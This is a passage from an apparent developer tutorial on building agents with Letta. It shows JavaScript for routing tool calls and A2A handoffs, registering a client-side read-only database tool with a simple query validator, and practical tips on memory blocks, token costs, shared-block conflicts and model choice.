You can also combine both: use Letta for its memory management while driving the agent loop from your own orchestration code. Create the agent via Letta’s API, send messages via the SDK, but handle tool routing, A2A handoffs, and business logic in your application layer:
// hybrid-orchestrator.js
// Use Letta for memory; own your tool routing
import Letta from '@letta-ai/letta-client';
import { handleA2AHandoff } from './a2a-context-bridge.js';
import { handleDomainTool } from './domain-tools.js';
const client = new Letta({ baseURL: 'http://localhost:8283' });
async function runTurn(agentId, userMessage, userId) {
const response = await client.agents.messages.create(agentId, {
messages: [{ role: 'user', content: userMessage }],
stream_steps: false, // take the whole run in one response; userId is used below when routing handoffs
});
// Process any tool calls that need external routing
for (const step of response.messages) {
if (step.message_type === 'tool_call' && step.tool_name === 'delegate_to_agent') {
// Route A2A handoffs through our own bridge
const handoffResult = await handleA2AHandoff(step.tool_arguments, userId);
// Inject the result back into the agent's context as a tool result
await client.agents.messages.create(agentId, {
messages: [{
role: 'tool',
content: JSON.stringify(handoffResult),
tool_call_id: step.tool_call_id,
}],
});
}
if (step.message_type === 'tool_call' && step.tool_name.startsWith('domain_')) {
const result = await handleDomainTool(step.tool_name, step.tool_arguments);
await client.agents.messages.create(agentId, {
messages: [{
role: 'tool',
content: JSON.stringify(result),
tool_call_id: step.tool_call_id,
}],
});
}
}
return response.messages
.filter(m => m.message_type === 'assistant_message')
.map(m => m.content)
.join('\n');
}
Deploying Custom Tools
Letta supports three tool types. Server-side tools have code that runs inside the Letta server’s sandboxed environment: safe for untrusted logic, limited in what they can access. MCP tools connect to any Model Context Protocol server: your agent can use any tool exposed by an MCP-compatible service (file systems, databases, web browsers, code execution). Client-side tools return only the JSON schema to the model; your application handles execution and passes the result back.
For production integrations, client-side tools are usually the right choice: your application owns the execution environment, credentials, and error handling. Register the schema with Letta so the model knows the tool exists; intercept the tool call in your application code:
// register-tools.js
// Register a client-side tool (schema only; you handle execution)
const dbQueryTool = await client.tools.create({
name: 'query_database',
description: 'Execute a read-only SQL query against the application database. Use for looking up user data, orders, or product information.',
tags: ['database', 'read-only'],
source_type: 'json', // client-side: no code, just schema
json_schema: {
name: 'query_database',
description: 'Execute a read-only SQL query',
parameters: {
type: 'object',
properties: {
query: {
type: 'string',
description: 'The SQL query to run. SELECT only. No mutations.',
},
limit: {
type: 'number',
description: 'Maximum rows to return (default 20, max 100).',
},
},
required: ['query'],
},
},
});
// Attach the tool to an agent
await client.agents.tools.attach(agentId, dbQueryTool.id);
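Interception then happens in your message-handling loop, mirroring the hybrid orchestrator shown earlier. Below is a minimal sketch of the application-side handler; `runReadOnlyQuery` is a hypothetical wrapper around your own DB driver, and the validation is deliberately conservative:

```javascript
// handle-db-tool.js
// Application-side handling for the client-side query_database tool.
// runReadOnlyQuery is a hypothetical wrapper around your DB driver.
function validateQuery(query) {
  // Enforce the read-only contract stated in the tool description
  const q = query.trim().toLowerCase();
  return q.startsWith('select') && !q.includes(';');
}

async function handleQueryDatabase(args, runReadOnlyQuery) {
  if (!validateQuery(args.query)) {
    return { error: 'Only single SELECT statements are allowed.' };
  }
  const limit = Math.min(args.limit ?? 20, 100); // schema defaults: 20, capped at 100
  const rows = await runReadOnlyQuery(args.query, limit);
  return { rows };
}
```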
What to Watch Out For
The agent creates its own memory; don’t fight it. The model decides what goes into memory blocks and when. If the agent is not remembering something you expect it to, improve the description field on the relevant block. The description is the only instruction the model has for deciding when to write to that block.
Block limits are character counts, not token counts. A 5,000-character block costs roughly 1,250 tokens in your context window on every turn. If you have six blocks at 5,000 chars each, you have already spent 7,500 tokens before a single message is processed. Be deliberate about how many blocks you create and how large they are.
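The arithmetic is worth making explicit. A rough rule of thumb is four characters per token (real tokenizers vary by model and content):

```javascript
// Estimate the per-turn context cost of a set of memory blocks,
// using the rough ~4 characters per token heuristic.
function blockTokenBudget(blocks) {
  const chars = blocks.reduce((sum, b) => sum + b.limit, 0);
  return Math.ceil(chars / 4);
}

// The four blocks from the agent created earlier: 5000 + 5000 + 8000 + 3000 chars
console.log(blockTokenBudget([
  { limit: 5000 }, { limit: 5000 }, { limit: 8000 }, { limit: 3000 },
])); // 5250 tokens reserved before any conversation happens
```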
Shared blocks have last-write-wins semantics. If two agents update the same shared block concurrently, the last write overwrites the earlier one. For coordination state that multiple agents write, use a structured JSON format inside the block and have agents do read-modify-write operations carefully. Or use a dedicated supervisor agent as the sole writer.
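A sketch of the careful read-modify-write that paragraph describes, with the pure merge step separated from the I/O. The `client.blocks.modify` call is an assumed update counterpart to the retrieve call used earlier (check your SDK version), and note this only narrows the race window; without compare-and-swap, last write still wins if two writers interleave:

```javascript
// read-modify-write.js
// Append a worker's result to a shared JSON state block.
function appendResult(stateJson, workerName, result) {
  // Pure merge step: parse, append, re-serialise
  const state = JSON.parse(stateJson);
  state.results = [...state.results, { worker: workerName, result }];
  return JSON.stringify(state);
}

async function reportResult(client, blockId, workerName, result) {
  const block = await client.blocks.retrieve(blockId);        // read
  const next = appendResult(block.value, workerName, result); // modify
  // Write back; method name assumed, not confirmed against the SDK
  await client.blocks.modify(blockId, { value: next });
}
```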
One agent per user is not always the right model. For a large user base, thousands of agents each with their own archival memory index can become expensive to manage. The Conversations API lets one agent serve many users without multiplying infrastructure; evaluate whether your use case actually needs per-user agents or just per-user conversation isolation.
Seed archival memory before go-live. An agent with an empty archival store has no domain knowledge beyond its system prompt. Invest time before launch in bulk-loading your codebase context, documentation, past decision logs, or relevant domain content. A well-seeded archival store transforms a generic assistant into something that genuinely knows your system.
Use Claude 3.5 Haiku or GPT-4o mini for worker agents in multi-agent systems. The frontier models (Claude 3.7 Sonnet, GPT-4o) are necessary for the supervisor that does planning and synthesis; they are overkill for workers executing narrow, well-defined tasks. The cost difference is roughly 10x; the capability difference for simple tasks is negligible.
Heartbeats are the agent’s “thinking” loop. When a tool call returns request_heartbeat: true, Letta re-invokes the agent so it can reason about the result before responding. This is how multi-step reasoning works. Do not disable heartbeats on tasks that require chaining tool calls; you will get shallow, single-step responses.